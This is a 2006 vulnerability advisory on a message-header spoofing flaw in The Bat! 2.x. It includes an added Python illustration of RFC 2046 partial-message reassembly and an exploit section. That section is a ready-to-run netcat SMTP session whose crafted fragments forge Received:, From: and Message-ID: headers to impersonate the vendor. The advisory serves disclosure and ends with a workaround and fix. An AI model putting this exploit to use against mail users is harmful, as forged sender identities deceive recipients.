SECURITY.NNOV: The Bat! 2.x message headers spoofing

2006-02-06T00:00:00
ID SECURITYVULNS:DOC:11310
Type securityvulns
Reporter Securityvulns
Modified 2006-02-06T00:00:00

Description

Title: The Bat! 2.x message headers spoofing
Author: 3APA3A <3APA3A@security.nnov.ru>
Homepage: http://www.security.nnov.ru/
Advisory URL: http://www.security.nnov.ru/advisories/thebatspoof.asp
Vendor: RitLabs
Vendor's page: http://thebat.net/
Application: The Bat 2.x (2.12.04 tested)
Not vulnerable: The Bat! 3.5
Remote: Yes, against client
Category: Information spoofing

Intro:

The Bat! is a very convenient, powerful and (compared with others) secure MUA (Mail User Agent) with many professional features: templates, macros, a Bayesian spam filter, etc. It is a commercial product from RitLabs.

Vulnerability:

A design flaw in the way The Bat! displays message/partial messages allows an attacker to spoof the RFC 822 headers of the original message, including all Received: and Message-ID: headers. This makes it possible to create an untraceable message and to spoof the message origin, including the sender's network.

Details:

The Bat! silently reassembles partial messages and displays the encapsulated data. The headers shown are those of the encapsulated message; the real headers are lost completely.
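The reassembly rules a client should follow are given in RFC 2046 section 5.2.2.1: envelope headers such as Received:, From:, To: and Date: come from the outer enclosing message of fragment 1, and only Content-*, Subject, Message-ID, Encrypted and MIME-Version come from the reassembled inner message. The Python below is an added example, not code from the advisory or from RitLabs; the two fragments are constructed and modelled on the advisory's exploit session, with placeholder hosts, addresses and IDs. spoofable_headers() lists the inner headers a conforming client drops; a client that displayed those instead of the outer ones, which is the behaviour described above, would show sender-controlled origin data.

```python
"""RFC 2046 section 5.2.2.1 reassembly of message/partial fragments.

Envelope headers (Received:, From:, To:, Date:, ...) come from the outer
enclosing message of fragment 1; only Content-*, Subject, Message-ID,
Encrypted and MIME-Version come from the reassembled inner message.
"""
from email.message import Message
from email.parser import Parser

# Fields RFC 2046 says to take from the inner message on reassembly.
INNER_ONLY = {"subject", "message-id", "encrypted", "mime-version"}


def _from_inner(name: str) -> bool:
    n = name.lower()
    return n.startswith("content-") or n in INNER_ONLY


def parse_fragment(raw: str) -> Message:
    """Parse a fragment's headers only, keeping its body as raw text so the
    parser does not descend into the (incomplete) enclosed message."""
    msg = Parser().parsestr(raw, headersonly=True)
    if msg.get_content_type() != "message/partial":
        raise ValueError(f"not a message/partial fragment: {msg.get_content_type()}")
    return msg


def reassemble(fragments):
    """Return (reassembled message, outer fragment 1, inner message)."""
    parts = [parse_fragment(f) for f in fragments]
    ids = {p.get_param("id") for p in parts}
    if len(ids) != 1:
        raise ValueError(f"fragments belong to different sets: {ids}")
    parts.sort(key=lambda p: int(p.get_param("number")))
    numbers = [int(p.get_param("number")) for p in parts]
    totals = {int(p.get_param("total")) for p in parts if p.get_param("total")}
    if len(totals) != 1 or numbers != list(range(1, next(iter(totals)) + 1)):
        raise ValueError(f"incomplete or inconsistent set: numbers={numbers} totals={totals}")
    # The fragment bodies, concatenated in order, form the inner message.
    inner = Parser().parsestr("".join(p.get_payload() for p in parts), headersonly=True)
    outer = parts[0]
    out = Message()
    for name, value in outer.items():  # (1) envelope headers from the outer message
        if not _from_inner(name):
            out[name] = value
    for name, value in inner.items():  # (2) content headers from the inner message
        if _from_inner(name):
            out[name] = value
    out.set_payload(inner.get_payload())  # (3) the body is the inner body
    return out, outer, inner


def spoofable_headers(outer: Message, inner: Message):
    """Inner headers RFC 2046 requires to be dropped, as (name, inner value,
    outer value) triples.  A client that showed the inner value instead of the
    outer one would display whatever the sender wrote inside the fragments."""
    return [(n, v, outer.get(n)) for n, v in inner.items() if not _from_inner(n)]


# Constructed sample modelled on the advisory's exploit session; hosts, IPs,
# addresses and IDs are placeholders, not values from the original message.
FRAGMENT_1 = """\
Received: from relay.example.net (relay.example.net [192.0.2.10]) by mx.example.com (Postfix) with ESMTP id CONSTRUCTED1 for <phiby@example.com>; Mon, 31 Jan 2006 13:30:00 +0300 (MSK)
Date: Mon, 31 Jan 2006 13:30:00 +0300
From: 3APA3A <phiby@example.com>
To: Phiby <phiby@example.com>
Subject: Re[7]: //
Message-ID: <p1.split@example.com>
MIME-Version: 1.0
Content-Type: message/partial; id="split@example.com"; number=1; total=2

Received: from mail.vendor.example (mail.vendor.example [192.0.2.20]) by mx.example.com (Postfix) with ESMTP id CONSTRUCTED2 for <phiby@example.com>; Mon, 31 Jan 2006 13:30:06 +0300 (MSK)
Date: Mon, 31 Jan 2006 13:30:06 +0300
From: Vendor developers <bugs@vendor.example>
To: Phiby <phiby@example.com>
Subject: Re[7]: //
Message-ID: <real-message@vendor.example>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii

Dear Phiby,

"""

FRAGMENT_2 = """\
Date: Mon, 31 Jan 2006 13:30:06 +0300
From: 3APA3A <phiby@example.com>
To: Phiby <phiby@example.com>
Subject: Re[7]: //
Message-ID: <p2.split@example.com>
MIME-Version: 1.0
Content-Type: message/partial; id="split@example.com"; number=2; total=2

Best wishes from the vendor.
"""

if __name__ == "__main__":
    msg, outer, inner = reassemble([FRAGMENT_1, FRAGMENT_2])
    print(msg.as_string())
    for name, inner_v, outer_v in spoofable_headers(outer, inner):
        print(f"dropped inner {name}: {inner_v!r} (outer: {outer_v!r})")
```

Note that RFC 2046 does take Message-ID from the inner message, so a sender-chosen Message-ID is expected even in a conforming client; the outer Received: trail is the evidence that must survive reassembly, and it is exactly what the flawed client discards.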

Exploit:

Replace @example.com with the destination address, then run:

nc ip_of_smtp_relay 25 <thebatexploit.txt

-=-=-=-=- begin thebatexploit.txt -=-=-=-=-
HELO example.com
MAIL FROM: <phiby@example.com>
RCPT TO: <phiby@example.com>
DATA
Date: Mon, 31 Jan 2006 13:30:00 +0300
From: 3APA3A <phiby@example.com>
X-Mailer: The Bat! (v2.12.00)
Organization: http://www.security.nnov.ru/
X-Priority: 3 (Normal)
Message-ID: <994591752.20060130184706@thebat.net>
To: Phiby <phiby@example.com>
Subject: Subject: Re[7]: //
Message-ID: <p#1split@ACB0994591752.20060130184706@thebat.net>
MIME-Version: 1.0
Content-Type: message/partial; id="split@ACB0994591752.20060130184706@thebat.net"; number=1; total=2

Received: from mail.ritlabs.com (mail.ritlabs.com [198.63.208.135])
 by mail.example.com (Postfix) with ESMTP id 9F89619EBEB
 for <phiby@example.com>; Mon, 31 Jan 2006 13:30:06 +0300 (MSK)
Date: Mon, 31 Jan 2006 13:30:06 +0300
From: The Bat! developers <bugs@thebat.net>
X-Mailer: The Bat! (v2.12.00)
Organization: RitLabs
X-Priority: 3 (Normal)
Message-ID: <994591752.20060130184706@thebat.net>
To: Phiby <phiby@example.com>
Subject: Subject: Re[7]: //
MIME-Version: 1.0
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 8bit

Dear Phiby,

Best wishes for you and http://phiby.com/
.
RSET
MAIL FROM: <phiby@example.com>
RCPT TO: <phiby@example.com>
DATA
Date: Mon, 30 Jan 2006 13:30:06 +0300
From: 3APA3A <phiby@example.com>
Organization: http://www.security.nnov.ru/
X-Mailer: The Bat! (v2.12.00)
Organization: Microsoft
X-Priority: 3 (Normal)
Message-ID: <994591752.20060130184706@thebat.net>
To: Phiby <phiby@example.com>
Subject: Subject: Re[7]: //
Message-ID: <p#2split@ACB0994591752.20060130184706@microsof.com>
MIME-Version: 1.0
Content-Type: message/partial; id="split@ACB0994591752.20060130184706@thebat.net"; number=2; total=2

Yours, The Bat! develpment team.
.
QUIT
-=-=-=-=- end thebatexploit.txt -=-=-=-=-

Workaround:

Do not trust the header data that The Bat! displays.

Solution:

Upgrade to The Bat! 3.x (the upgrade is not free).